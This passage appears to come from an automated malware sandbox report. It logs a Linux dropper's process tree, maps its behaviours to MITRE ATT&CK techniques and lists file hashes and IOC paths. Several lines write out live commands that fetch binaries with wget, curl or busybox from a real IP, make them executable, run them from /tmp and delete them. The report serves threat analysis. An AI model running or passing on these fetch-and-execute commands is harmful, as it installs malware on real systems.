- /usr/bin/curl
  curl -O http://87.120.125.191/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:879
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z
  2⤵
  PID:880
- /bin/chmod
  chmod 777 Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z
  2⤵
  - File and Directory Permissions Modification
  PID:881
- /tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z
  ./Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z
  2⤵
  - Executes dropped EXE
  PID:882
- /bin/rm
  rm Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z
  2⤵
  PID:883
- /usr/bin/wget
  wget http://87.120.125.191/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ
  2⤵
  - System Network Configuration Discovery
  PID:884
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:885
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ
  2⤵
  - System Network Configuration Discovery
  PID:886
- /bin/chmod
  chmod 777 TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ
  2⤵
  - File and Directory Permissions Modification
  PID:887
- /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ
  ./TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:888
- /bin/rm
  rm TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ
  2⤵
  - System Network Configuration Discovery
  PID:889
- /usr/bin/wget
  wget http://87.120.125.191/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc
  2⤵
  PID:890
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:891
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc
  2⤵
  PID:892
- /bin/chmod
  chmod 777 nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc
  2⤵
  - File and Directory Permissions Modification
  PID:893
- /tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc
  ./nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc
  2⤵
  - Executes dropped EXE
  PID:894
- /bin/rm
  rm nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc
  2⤵
  PID:895
- /usr/bin/wget
  wget http://87.120.125.191/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD
  2⤵
  PID:896
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:897
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD
  2⤵
  PID:898
- /bin/chmod
  chmod 777 C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD
  2⤵
  - File and Directory Permissions Modification
  PID:899
- /tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD
  ./C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD
  2⤵
  - Executes dropped EXE
  PID:900
- /bin/rm
  rm C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD
  2⤵
  PID:901
- /usr/bin/wget
  wget http://87.120.125.191/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
  2⤵
  PID:902
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:903
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
  2⤵
  PID:904
- /bin/chmod
  chmod 777 tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
  2⤵
  - File and Directory Permissions Modification
  PID:905
- /tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
  ./tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
  2⤵
  - Executes dropped EXE
  PID:906
- /bin/rm
  rm tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
  2⤵
  PID:907
- /usr/bin/wget
  wget http://87.120.125.191/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs
  2⤵
  PID:908
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:909
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs
  2⤵
  PID:911
- /bin/chmod
  chmod 777 B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs
  2⤵
  - File and Directory Permissions Modification
  PID:913
- /tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs
  ./B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs
  2⤵
  - Executes dropped EXE
  PID:914
- /bin/rm
  rm B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs
  2⤵
  PID:915
- /usr/bin/wget
  wget http://87.120.125.191/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G
  2⤵
  PID:916
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:917
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G
  2⤵
  PID:918
- /bin/chmod
  chmod 777 ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G
  2⤵
  - File and Directory Permissions Modification
  PID:919
- /tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G
  ./ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G
  2⤵
  - Executes dropped EXE
  PID:920
- /bin/rm
  rm ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G
  2⤵
  PID:921
- /usr/bin/wget
  wget http://87.120.125.191/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls
  2⤵
  PID:922
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:923
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls
  2⤵
  PID:924
- /bin/chmod
  chmod 777 1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls
  2⤵
  - File and Directory Permissions Modification
  PID:925
- /tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls
  ./1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls
  2⤵
  - Executes dropped EXE
  PID:926
- /bin/rm
  rm 1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls
  2⤵
  PID:927
- /usr/bin/wget
  wget http://87.120.125.191/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb
  2⤵
  PID:928

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

System Network Configuration Discovery

T1016

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls

Filesize
153B

MD5
998368d7c95ea4293237f2320546e440

SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Download Submit
memory/802-1-0xb66c0000-0xb66d1044-memory.dmp

Download
memory/879-2-0xb66f5000-0xb6706044-memory.dmp

Download
memory/916-3-0xb6726000-0xb6737044-memory.dmp

Download

ioc	pid	process
/tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls	685	1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls
/tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs	697	tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
/tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs	704	B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs
/tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G	710	ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G
/tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb	721	zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb
/tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe	733	p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe
/tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm	747	UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm
/tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6	760	3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6
/tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc	773	nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc
/tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD	789	C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD
/tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn	799	6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn
/tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM	805	L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM
/tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z	816	Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z
/tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ	832	TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ
/tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm	844	UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm
/tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6	856	3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6
/tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn	868	6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn
/tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM	876	L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM
/tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z	882	Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z
/tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ	888	TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ
/tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc	894	nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc
/tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD	900	C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD
/tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs	906	tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
/tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs	914	B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs
/tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G	920	ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G
/tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls	926	1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls